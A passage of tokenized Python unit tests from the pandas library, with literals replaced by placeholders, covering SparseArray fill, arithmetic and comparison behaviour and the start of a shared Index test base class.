[ <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> , <NUM_LIT:3> , - <NUM_LIT:1> ] , fill_value = <NUM_LIT:0> ) <EOL> tm . assert_sp_array_equal ( res , exp ) <EOL> s = SparseArray ( [ <NUM_LIT:1> , np . nan , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:0> ] ) <EOL> res = s . fillna ( - <NUM_LIT:1> ) <EOL> exp = SparseArray ( [ <NUM_LIT:1> , - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:0> ] , fill_value = - <NUM_LIT:1> ) <EOL> tm . assert_sp_array_equal ( res , exp ) <EOL> s = SparseArray ( [ <NUM_LIT:1> , np . nan , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:0> ] , fill_value = <NUM_LIT:0> ) <EOL> res = s . fillna ( - <NUM_LIT:1> ) <EOL> exp = SparseArray ( [ <NUM_LIT:1> , - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:0> ] , fill_value = <NUM_LIT:0> ) <EOL> tm . assert_sp_array_equal ( res , exp ) <EOL> s = SparseArray ( [ np . nan , np . nan , np . nan , np . nan ] ) <EOL> res = s . 
fillna ( - <NUM_LIT:1> ) <EOL> exp = SparseArray ( [ - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ] , fill_value = - <NUM_LIT:1> ) <EOL> tm . assert_sp_array_equal ( res , exp ) <EOL> s = SparseArray ( [ np . nan , np . nan , np . nan , np . nan ] , fill_value = <NUM_LIT:0> ) <EOL> res = s . fillna ( - <NUM_LIT:1> ) <EOL> exp = SparseArray ( [ - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ] , fill_value = <NUM_LIT:0> ) <EOL> tm . assert_sp_array_equal ( res , exp ) <EOL> s = SparseArray ( [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ) <EOL> res = s . fillna ( - <NUM_LIT:1> ) <EOL> exp = SparseArray ( [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , fill_value = - <NUM_LIT:1> ) <EOL> tm . assert_sp_array_equal ( res , exp ) <EOL> s = SparseArray ( [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , fill_value = <NUM_LIT:0> ) <EOL> res = s . fillna ( - <NUM_LIT:1> ) <EOL> exp = SparseArray ( [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , fill_value = <NUM_LIT:0> ) <EOL> tm . assert_sp_array_equal ( res , exp ) <EOL> def test_fillna_overlap ( self ) : <EOL> s = SparseArray ( [ <NUM_LIT:1> , np . nan , np . nan , <NUM_LIT:3> , np . nan ] ) <EOL> res = s . fillna ( <NUM_LIT:3> ) <EOL> exp = np . array ( [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> ] ) <EOL> tm . assert_numpy_array_equal ( res . to_dense ( ) , exp ) <EOL> s = SparseArray ( [ <NUM_LIT:1> , np . nan , np . nan , <NUM_LIT:3> , np . nan ] , fill_value = <NUM_LIT:0> ) <EOL> res = s . fillna ( <NUM_LIT:3> ) <EOL> exp = SparseArray ( [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> ] , fill_value = <NUM_LIT:0> ) <EOL> tm . assert_sp_array_equal ( res , exp ) <EOL> class TestSparseArrayArithmetic ( tm . TestCase ) : <EOL> _multiprocess_can_split_ = True <EOL> def _check_numeric_ops ( self , a , b , a_dense , b_dense ) : <EOL> tm . assert_numpy_array_equal ( ( a + b ) . 
to_dense ( ) , a_dense + b_dense ) <EOL> tm . assert_numpy_array_equal ( ( b + a ) . to_dense ( ) , b_dense + a_dense ) <EOL> tm . assert_numpy_array_equal ( ( a - b ) . to_dense ( ) , a_dense - b_dense ) <EOL> tm . assert_numpy_array_equal ( ( b - a ) . to_dense ( ) , b_dense - a_dense ) <EOL> tm . assert_numpy_array_equal ( ( a * b ) . to_dense ( ) , a_dense * b_dense ) <EOL> tm . assert_numpy_array_equal ( ( b * a ) . to_dense ( ) , b_dense * a_dense ) <EOL> tm . assert_numpy_array_equal ( ( a / b ) . to_dense ( ) , a_dense / b_dense ) <EOL> tm . assert_numpy_array_equal ( ( b / a ) . to_dense ( ) , b_dense / a_dense ) <EOL> tm . assert_numpy_array_equal ( ( a // b ) . to_dense ( ) , a_dense // b_dense ) <EOL> tm . assert_numpy_array_equal ( ( b // a ) . to_dense ( ) , b_dense // a_dense ) <EOL> tm . assert_numpy_array_equal ( ( a % b ) . to_dense ( ) , a_dense % b_dense ) <EOL> tm . assert_numpy_array_equal ( ( b % a ) . to_dense ( ) , b_dense % a_dense ) <EOL> tm . assert_numpy_array_equal ( ( a ** b ) . to_dense ( ) , a_dense ** b_dense ) <EOL> tm . assert_numpy_array_equal ( ( b ** a ) . to_dense ( ) , b_dense ** a_dense ) <EOL> def _check_comparison_ops ( self , a , b , a_dense , b_dense ) : <EOL> def _check ( res ) : <EOL> tm . assertIsInstance ( res , SparseArray ) <EOL> self . assertEqual ( res . dtype , np . bool ) <EOL> self . assertIsInstance ( res . fill_value , bool ) <EOL> _check ( a == b ) <EOL> tm . assert_numpy_array_equal ( ( a == b ) . to_dense ( ) , a_dense == b_dense ) <EOL> _check ( a != b ) <EOL> tm . assert_numpy_array_equal ( ( a != b ) . to_dense ( ) , a_dense != b_dense ) <EOL> _check ( a >= b ) <EOL> tm . assert_numpy_array_equal ( ( a >= b ) . to_dense ( ) , a_dense >= b_dense ) <EOL> _check ( a <= b ) <EOL> tm . assert_numpy_array_equal ( ( a <= b ) . to_dense ( ) , a_dense <= b_dense ) <EOL> _check ( a > b ) <EOL> tm . assert_numpy_array_equal ( ( a > b ) . to_dense ( ) , a_dense > b_dense ) <EOL> _check ( a < b ) <EOL> tm . 
assert_numpy_array_equal ( ( a < b ) . to_dense ( ) , a_dense < b_dense ) <EOL> def test_float_scalar ( self ) : <EOL> values = np . array ( [ np . nan , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> , np . nan , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> , np . nan ] ) <EOL> for kind in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> a = SparseArray ( values , kind = kind ) <EOL> self . _check_numeric_ops ( a , <NUM_LIT:1> , values , <NUM_LIT:1> ) <EOL> self . _check_numeric_ops ( a , <NUM_LIT:0> , values , <NUM_LIT:0> ) <EOL> self . _check_numeric_ops ( a , <NUM_LIT:3> , values , <NUM_LIT:3> ) <EOL> a = SparseArray ( values , kind = kind , fill_value = <NUM_LIT:0> ) <EOL> self . _check_numeric_ops ( a , <NUM_LIT:1> , values , <NUM_LIT:1> ) <EOL> self . _check_numeric_ops ( a , <NUM_LIT:0> , values , <NUM_LIT:0> ) <EOL> self . _check_numeric_ops ( a , <NUM_LIT:3> , values , <NUM_LIT:3> ) <EOL> a = SparseArray ( values , kind = kind , fill_value = <NUM_LIT:2> ) <EOL> self . _check_numeric_ops ( a , <NUM_LIT:1> , values , <NUM_LIT:1> ) <EOL> self . _check_numeric_ops ( a , <NUM_LIT:0> , values , <NUM_LIT:0> ) <EOL> self . _check_numeric_ops ( a , <NUM_LIT:3> , values , <NUM_LIT:3> ) <EOL> def test_float_scalar_comparison ( self ) : <EOL> values = np . array ( [ np . nan , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> , np . nan , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> , np . nan ] ) <EOL> for kind in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> a = SparseArray ( values , kind = kind ) <EOL> self . _check_comparison_ops ( a , <NUM_LIT:1> , values , <NUM_LIT:1> ) <EOL> self . _check_comparison_ops ( a , <NUM_LIT:0> , values , <NUM_LIT:0> ) <EOL> self . _check_comparison_ops ( a , <NUM_LIT:3> , values , <NUM_LIT:3> ) <EOL> a = SparseArray ( values , kind = kind , fill_value = <NUM_LIT:0> ) <EOL> self . _check_comparison_ops ( a , <NUM_LIT:1> , values , <NUM_LIT:1> ) <EOL> self . _check_comparison_ops ( a , <NUM_LIT:0> , values , <NUM_LIT:0> ) <EOL> self . 
_check_comparison_ops ( a , <NUM_LIT:3> , values , <NUM_LIT:3> ) <EOL> a = SparseArray ( values , kind = kind , fill_value = <NUM_LIT:2> ) <EOL> self . _check_comparison_ops ( a , <NUM_LIT:1> , values , <NUM_LIT:1> ) <EOL> self . _check_comparison_ops ( a , <NUM_LIT:0> , values , <NUM_LIT:0> ) <EOL> self . _check_comparison_ops ( a , <NUM_LIT:3> , values , <NUM_LIT:3> ) <EOL> def test_float_same_index ( self ) : <EOL> for kind in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> values = np . array ( [ np . nan , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> , np . nan , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> , np . nan ] ) <EOL> rvalues = np . array ( [ np . nan , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , np . nan , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:2> , np . nan ] ) <EOL> a = SparseArray ( values , kind = kind ) <EOL> b = SparseArray ( rvalues , kind = kind ) <EOL> self . _check_numeric_ops ( a , b , values , rvalues ) <EOL> values = np . array ( [ <NUM_LIT:0.> , <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT:1.> , <NUM_LIT:0.> ] ) <EOL> rvalues = np . array ( [ <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.> ] ) <EOL> a = SparseArray ( values , kind = kind , fill_value = <NUM_LIT:0> ) <EOL> b = SparseArray ( rvalues , kind = kind , fill_value = <NUM_LIT:0> ) <EOL> self . _check_numeric_ops ( a , b , values , rvalues ) <EOL> def test_float_same_index_comparison ( self ) : <EOL> for kind in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> values = np . array ( [ np . nan , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> , np . nan , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> , np . nan ] ) <EOL> rvalues = np . array ( [ np . nan , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , np . nan , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:2> , np . 
nan ] ) <EOL> a = SparseArray ( values , kind = kind ) <EOL> b = SparseArray ( rvalues , kind = kind ) <EOL> self . _check_comparison_ops ( a , b , values , rvalues ) <EOL> values = np . array ( [ <NUM_LIT:0.> , <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT:1.> , <NUM_LIT:0.> ] ) <EOL> rvalues = np . array ( [ <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.> ] ) <EOL> a = SparseArray ( values , kind = kind , fill_value = <NUM_LIT:0> ) <EOL> b = SparseArray ( rvalues , kind = kind , fill_value = <NUM_LIT:0> ) <EOL> self . _check_comparison_ops ( a , b , values , rvalues ) <EOL> def test_float_array ( self ) : <EOL> values = np . array ( [ np . nan , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> , np . nan , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> , np . nan ] ) <EOL> rvalues = np . array ( [ <NUM_LIT:2> , np . nan , <NUM_LIT:2> , <NUM_LIT:3> , np . nan , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:2> , np . nan ] ) <EOL> for kind in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> a = SparseArray ( values , kind = kind ) <EOL> b = SparseArray ( rvalues , kind = kind ) <EOL> self . _check_numeric_ops ( a , b , values , rvalues ) <EOL> self . _check_numeric_ops ( a , b * <NUM_LIT:0> , values , rvalues * <NUM_LIT:0> ) <EOL> a = SparseArray ( values , kind = kind , fill_value = <NUM_LIT:0> ) <EOL> b = SparseArray ( rvalues , kind = kind ) <EOL> self . _check_numeric_ops ( a , b , values , rvalues ) <EOL> a = SparseArray ( values , kind = kind , fill_value = <NUM_LIT:0> ) <EOL> b = SparseArray ( rvalues , kind = kind , fill_value = <NUM_LIT:0> ) <EOL> self . _check_numeric_ops ( a , b , values , rvalues ) <EOL> a = SparseArray ( values , kind = kind , fill_value = <NUM_LIT:1> ) <EOL> b = SparseArray ( rvalues , kind = kind , fill_value = <NUM_LIT:2> ) <EOL> self . 
_check_numeric_ops ( a , b , values , rvalues ) <EOL> def test_float_array_different_kind ( self ) : <EOL> values = np . array ( [ np . nan , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> , np . nan , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> , np . nan ] ) <EOL> rvalues = np . array ( [ <NUM_LIT:2> , np . nan , <NUM_LIT:2> , <NUM_LIT:3> , np . nan , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:2> , np . nan ] ) <EOL> a = SparseArray ( values , kind = '<STR_LIT>' ) <EOL> b = SparseArray ( rvalues , kind = '<STR_LIT>' ) <EOL> self . _check_numeric_ops ( a , b , values , rvalues ) <EOL> self . _check_numeric_ops ( a , b * <NUM_LIT:0> , values , rvalues * <NUM_LIT:0> ) <EOL> a = SparseArray ( values , kind = '<STR_LIT>' , fill_value = <NUM_LIT:0> ) <EOL> b = SparseArray ( rvalues , kind = '<STR_LIT>' ) <EOL> self . _check_numeric_ops ( a , b , values , rvalues ) <EOL> a = SparseArray ( values , kind = '<STR_LIT>' , fill_value = <NUM_LIT:0> ) <EOL> b = SparseArray ( rvalues , kind = '<STR_LIT>' , fill_value = <NUM_LIT:0> ) <EOL> self . _check_numeric_ops ( a , b , values , rvalues ) <EOL> a = SparseArray ( values , kind = '<STR_LIT>' , fill_value = <NUM_LIT:1> ) <EOL> b = SparseArray ( rvalues , kind = '<STR_LIT>' , fill_value = <NUM_LIT:2> ) <EOL> self . _check_numeric_ops ( a , b , values , rvalues ) <EOL> def test_float_array_comparison ( self ) : <EOL> values = np . array ( [ np . nan , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> , np . nan , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> , np . nan ] ) <EOL> rvalues = np . array ( [ <NUM_LIT:2> , np . nan , <NUM_LIT:2> , <NUM_LIT:3> , np . nan , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:2> , np . nan ] ) <EOL> for kind in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> a = SparseArray ( values , kind = kind ) <EOL> b = SparseArray ( rvalues , kind = kind ) <EOL> self . _check_comparison_ops ( a , b , values , rvalues ) <EOL> self . 
_check_comparison_ops ( a , b * <NUM_LIT:0> , values , rvalues * <NUM_LIT:0> ) <EOL> a = SparseArray ( values , kind = kind , fill_value = <NUM_LIT:0> ) <EOL> b = SparseArray ( rvalues , kind = kind ) <EOL> self . _check_comparison_ops ( a , b , values , rvalues ) <EOL> a = SparseArray ( values , kind = kind , fill_value = <NUM_LIT:0> ) <EOL> b = SparseArray ( rvalues , kind = kind , fill_value = <NUM_LIT:0> ) <EOL> self . _check_comparison_ops ( a , b , values , rvalues ) <EOL> a = SparseArray ( values , kind = kind , fill_value = <NUM_LIT:1> ) <EOL> b = SparseArray ( rvalues , kind = kind , fill_value = <NUM_LIT:2> ) <EOL> self . _check_comparison_ops ( a , b , values , rvalues ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import nose <EOL> nose . runmodule ( argv = [ __file__ , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> exit = False ) </s>
<s> from pandas import compat <EOL> from pandas . compat import PY3 <EOL> import numpy as np <EOL> from pandas import ( Series , Index , Float64Index , Int64Index , RangeIndex , <EOL> MultiIndex , CategoricalIndex , DatetimeIndex , <EOL> TimedeltaIndex , PeriodIndex ) <EOL> from pandas . util . testing import assertRaisesRegexp <EOL> import pandas . util . testing as tm <EOL> import pandas as pd <EOL> class Base ( object ) : <EOL> """<STR_LIT>""" <EOL> _holder = None <EOL> _compat_props = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:size>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def setup_indices ( self ) : <EOL> for name , idx in self . indices . items ( ) : <EOL> setattr ( self , name , idx ) <EOL> def verify_pickle ( self , index ) : <EOL> unpickled = self . round_trip_pickle ( index ) <EOL> self . assertTrue ( index . equals ( unpickled ) ) <EOL> def test_pickle_compat_construction ( self ) : <EOL> if self . _holder is None : <EOL> return <EOL> self . assertRaises ( TypeError , self . _holder ) <EOL> def test_shift ( self ) : <EOL> idx = self . create_index ( ) <EOL> self . assertRaises ( NotImplementedError , idx . shift , <NUM_LIT:1> ) <EOL> self . assertRaises ( NotImplementedError , idx . shift , <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> def test_create_index_existing_name ( self ) : <EOL> expected = self . create_index ( ) <EOL> if not isinstance ( expected , MultiIndex ) : <EOL> expected . name = '<STR_LIT:foo>' <EOL> result = pd . Index ( expected ) <EOL> tm . assert_index_equal ( result , expected ) <EOL> result = pd . Index ( expected , name = '<STR_LIT:bar>' ) <EOL> expected . name = '<STR_LIT:bar>' <EOL> tm . assert_index_equal ( result , expected ) <EOL> else : <EOL> expected . names = [ '<STR_LIT:foo>' , '<STR_LIT:bar>' ] <EOL> result = pd . Index ( expected ) <EOL> tm . 
assert_index_equal ( <EOL> result , Index ( Index ( [ ( '<STR_LIT:foo>' , '<STR_LIT>' ) , ( '<STR_LIT:foo>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:bar>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] , <EOL> dtype = '<STR_LIT:object>' ) , <EOL> names = [ '<STR_LIT:foo>' , '<STR_LIT:bar>' ] ) ) <EOL> result = pd . Index ( expected , names = [ '<STR_LIT:A>' , '<STR_LIT:B>' ] ) <EOL> tm . assert_index_equal ( <EOL> result , <EOL> Index ( Index ( [ ( '<STR_LIT:foo>' , '<STR_LIT>' ) , ( '<STR_LIT:foo>' , '<STR_LIT>' ) , ( '<STR_LIT:bar>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] , <EOL> dtype = '<STR_LIT:object>' ) , names = [ '<STR_LIT:A>' , '<STR_LIT:B>' ] ) ) <EOL> def test_numeric_compat ( self ) : <EOL> idx = self . create_index ( ) <EOL> tm . assertRaisesRegexp ( TypeError , "<STR_LIT>" , <EOL> lambda : idx * <NUM_LIT:1> ) <EOL> tm . assertRaisesRegexp ( TypeError , "<STR_LIT>" , <EOL> lambda : <NUM_LIT:1> * idx ) <EOL> div_err = "<STR_LIT>" if PY3 else "<STR_LIT>" <EOL> tm . assertRaisesRegexp ( TypeError , div_err , lambda : idx / <NUM_LIT:1> ) <EOL> tm . assertRaisesRegexp ( TypeError , div_err , lambda : <NUM_LIT:1> / idx ) <EOL> tm . assertRaisesRegexp ( TypeError , "<STR_LIT>" , <EOL> lambda : idx // <NUM_LIT:1> ) <EOL> tm . assertRaisesRegexp ( TypeError , "<STR_LIT>" , <EOL> lambda : <NUM_LIT:1> // idx ) <EOL> def test_logical_compat ( self ) : <EOL> idx = self . create_index ( ) <EOL> tm . assertRaisesRegexp ( TypeError , '<STR_LIT>' , <EOL> lambda : idx . all ( ) ) <EOL> tm . assertRaisesRegexp ( TypeError , '<STR_LIT>' , <EOL> lambda : idx . any ( ) ) <EOL> def test_boolean_context_compat ( self ) : <EOL> idx = self . create_index ( ) <EOL> def f ( ) : <EOL> if idx : <EOL> pass <EOL> tm . assertRaisesRegexp ( ValueError , '<STR_LIT>' , f ) <EOL> def test_reindex_base ( self ) : <EOL> idx = self . 
create_index ( ) <EOL> expected = np . arange ( idx . size ) <EOL> actual = idx . get_indexer ( idx ) <EOL> tm . assert_numpy_array_equal ( expected , actual ) <EOL> with tm . assertRaisesRegexp ( ValueError , '<STR_LIT>' ) : <EOL> idx . get_indexer ( idx , method = '<STR_LIT>' ) <EOL> def test_ndarray_compat_properties ( self ) : <EOL> idx = self . create_index ( ) <EOL> self . assertTrue ( idx . T . equals ( idx ) ) <EOL> self . assertTrue ( idx . transpose ( ) . equals ( idx ) ) <EOL> values = idx . values <EOL> for prop in self . _compat_props : <EOL> self . assertEqual ( getattr ( idx , prop ) , getattr ( values , prop ) ) <EOL> idx . nbytes <EOL> idx . values . nbytes <EOL> def test_repr_roundtrip ( self ) : <EOL> idx = self . create_index ( ) <EOL> tm . assert_index_equal ( eval ( repr ( idx ) ) , idx ) <EOL> def test_str ( self ) : <EOL> idx = self . create_index ( ) <EOL> idx . name = '<STR_LIT:foo>' <EOL> self . assertTrue ( "<STR_LIT>" in str ( idx ) ) <EOL> self . assertTrue ( idx . __class__ . __name__ in str ( idx ) ) <EOL> def test_dtype_str ( self ) : <EOL> for idx in self . indices . values ( ) : <EOL> dtype = idx . dtype_str <EOL> self . assertIsInstance ( dtype , compat . string_types ) <EOL> if isinstance ( idx , PeriodIndex ) : <EOL> self . assertEqual ( dtype , '<STR_LIT>' ) <EOL> else : <EOL> self . assertEqual ( dtype , str ( idx . dtype ) ) <EOL> def test_repr_max_seq_item_setting ( self ) : <EOL> idx = self . create_index ( ) <EOL> idx = idx . repeat ( <NUM_LIT:50> ) <EOL> with pd . option_context ( "<STR_LIT>" , None ) : <EOL> repr ( idx ) <EOL> self . assertFalse ( '<STR_LIT>' in str ( idx ) ) <EOL> def test_wrong_number_names ( self ) : <EOL> def testit ( ind ) : <EOL> ind . names = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> for ind in self . indices . values ( ) : <EOL> assertRaisesRegexp ( ValueError , "<STR_LIT>" , testit , ind ) <EOL> def test_set_name_methods ( self ) : <EOL> new_name = "<STR_LIT>" <EOL> for ind in self . 
indices . values ( ) : <EOL> if isinstance ( ind , MultiIndex ) : <EOL> continue <EOL> original_name = ind . name <EOL> new_ind = ind . set_names ( [ new_name ] ) <EOL> self . assertEqual ( new_ind . name , new_name ) <EOL> self . assertEqual ( ind . name , original_name ) <EOL> res = ind . rename ( new_name , inplace = True ) <EOL> self . assertIsNone ( res ) <EOL> self . assertEqual ( ind . name , new_name ) <EOL> self . assertEqual ( ind . names , [ new_name ] ) <EOL> with assertRaisesRegexp ( ValueError , "<STR_LIT>" ) : <EOL> ind . set_names ( "<STR_LIT:a>" , level = <NUM_LIT:0> ) <EOL> name = ( '<STR_LIT:A>' , '<STR_LIT:B>' ) <EOL> ind . rename ( name , inplace = True ) <EOL> self . assertEqual ( ind . name , name ) <EOL> self . assertEqual ( ind . names , [ name ] ) <EOL> def test_hash_error ( self ) : <EOL> for ind in self . indices . values ( ) : <EOL> with tm . assertRaisesRegexp ( TypeError , "<STR_LIT>" % <EOL> type ( ind ) . __name__ ) : <EOL> hash ( ind ) <EOL> def test_copy_and_deepcopy ( self ) : <EOL> from copy import copy , deepcopy <EOL> for ind in self . indices . values ( ) : <EOL> if isinstance ( ind , MultiIndex ) : <EOL> continue <EOL> for func in ( copy , deepcopy ) : <EOL> idx_copy = func ( ind ) <EOL> self . assertIsNot ( idx_copy , ind ) <EOL> self . assertTrue ( idx_copy . equals ( ind ) ) <EOL> new_copy = ind . copy ( deep = True , name = "<STR_LIT>" ) <EOL> self . assertEqual ( new_copy . name , "<STR_LIT>" ) <EOL> def test_duplicates ( self ) : <EOL> for ind in self . indices . values ( ) : <EOL> if not len ( ind ) : <EOL> continue <EOL> if isinstance ( ind , MultiIndex ) : <EOL> continue <EOL> idx = self . _holder ( [ ind [ <NUM_LIT:0> ] ] * <NUM_LIT:5> ) <EOL> self . assertFalse ( idx . is_unique ) <EOL> self . assertTrue ( idx . has_duplicates ) <EOL> idx . name = '<STR_LIT:foo>' <EOL> result = idx . drop_duplicates ( ) <EOL> self . assertEqual ( result . name , '<STR_LIT:foo>' ) <EOL> self . 
assert_index_equal ( result , Index ( [ ind [ <NUM_LIT:0> ] ] , name = '<STR_LIT:foo>' ) ) <EOL> def test_sort ( self ) : <EOL> for ind in self . indices . values ( ) : <EOL> self . assertRaises ( TypeError , ind . sort ) <EOL> def test_order ( self ) : <EOL> for ind in self . indices . values ( ) : <EOL> with tm . assert_produces_warning ( FutureWarning ) : <EOL> ind . order ( ) <EOL> def test_mutability ( self ) : <EOL> for ind in self . indices . values ( ) : <EOL> if not len ( ind ) : <EOL> continue <EOL> self . assertRaises ( TypeError , ind . __setitem__ , <NUM_LIT:0> , ind [ <NUM_LIT:0> ] ) <EOL> def test_view ( self ) : <EOL> for ind in self . indices . values ( ) : <EOL> i_view = ind . view ( ) <EOL> self . assertEqual ( i_view . name , ind . name ) <EOL> def test_compat ( self ) : <EOL> for ind in self . indices . values ( ) : <EOL> self . assertEqual ( ind . tolist ( ) , list ( ind ) ) <EOL> def test_argsort ( self ) : <EOL> for k , ind in self . indices . items ( ) : <EOL> if k in [ '<STR_LIT>' ] : <EOL> continue <EOL> result = ind . argsort ( ) <EOL> expected = np . array ( ind ) . argsort ( ) <EOL> tm . assert_numpy_array_equal ( result , expected ) <EOL> def test_pickle ( self ) : <EOL> for ind in self . indices . values ( ) : <EOL> self . verify_pickle ( ind ) <EOL> ind . name = '<STR_LIT:foo>' <EOL> self . verify_pickle ( ind ) <EOL> def test_take ( self ) : <EOL> indexer = [ <NUM_LIT:4> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:2> ] <EOL> for k , ind in self . indices . items ( ) : <EOL> if k in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> continue <EOL> result = ind . take ( indexer ) <EOL> expected = ind [ indexer ] <EOL> self . assertTrue ( result . equals ( expected ) ) <EOL> if not isinstance ( ind , <EOL> ( DatetimeIndex , PeriodIndex , TimedeltaIndex ) ) : <EOL> with tm . assertRaises ( AttributeError ) : <EOL> ind . freq <EOL> def test_setops_errorcases ( self ) : <EOL> for name , idx in compat . iteritems ( self . 
indices ) : <EOL> cases = [ <NUM_LIT:0.5> , '<STR_LIT>' ] <EOL> methods = [ idx . intersection , idx . union , idx . difference , <EOL> idx . symmetric_difference ] <EOL> for method in methods : <EOL> for case in cases : <EOL> assertRaisesRegexp ( TypeError , <EOL> "<STR_LIT>" , <EOL> method , case ) <EOL> def test_intersection_base ( self ) : <EOL> for name , idx in compat . iteritems ( self . indices ) : <EOL> first = idx [ : <NUM_LIT:5> ] <EOL> second = idx [ : <NUM_LIT:3> ] <EOL> intersect = first . intersection ( second ) <EOL> if isinstance ( idx , CategoricalIndex ) : <EOL> pass <EOL> else : <EOL> self . assertTrue ( tm . equalContents ( intersect , second ) ) <EOL> cases = [ klass ( second . values ) <EOL> for klass in [ np . array , Series , list ] ] <EOL> for case in cases : <EOL> if isinstance ( idx , PeriodIndex ) : <EOL> msg = "<STR_LIT>" <EOL> with tm . assertRaisesRegexp ( ValueError , msg ) : <EOL> result = first . intersection ( case ) <EOL> elif isinstance ( idx , CategoricalIndex ) : <EOL> pass <EOL> else : <EOL> result = first . intersection ( case ) <EOL> self . assertTrue ( tm . equalContents ( result , second ) ) <EOL> if isinstance ( idx , MultiIndex ) : <EOL> msg = "<STR_LIT>" <EOL> with tm . assertRaisesRegexp ( TypeError , msg ) : <EOL> result = first . intersection ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) <EOL> def test_union_base ( self ) : <EOL> for name , idx in compat . iteritems ( self . indices ) : <EOL> first = idx [ <NUM_LIT:3> : ] <EOL> second = idx [ : <NUM_LIT:5> ] <EOL> everything = idx <EOL> union = first . union ( second ) <EOL> self . assertTrue ( tm . equalContents ( union , everything ) ) <EOL> cases = [ klass ( second . values ) <EOL> for klass in [ np . array , Series , list ] ] <EOL> for case in cases : <EOL> if isinstance ( idx , PeriodIndex ) : <EOL> msg = "<STR_LIT>" <EOL> with tm . assertRaisesRegexp ( ValueError , msg ) : <EOL> result = first . 
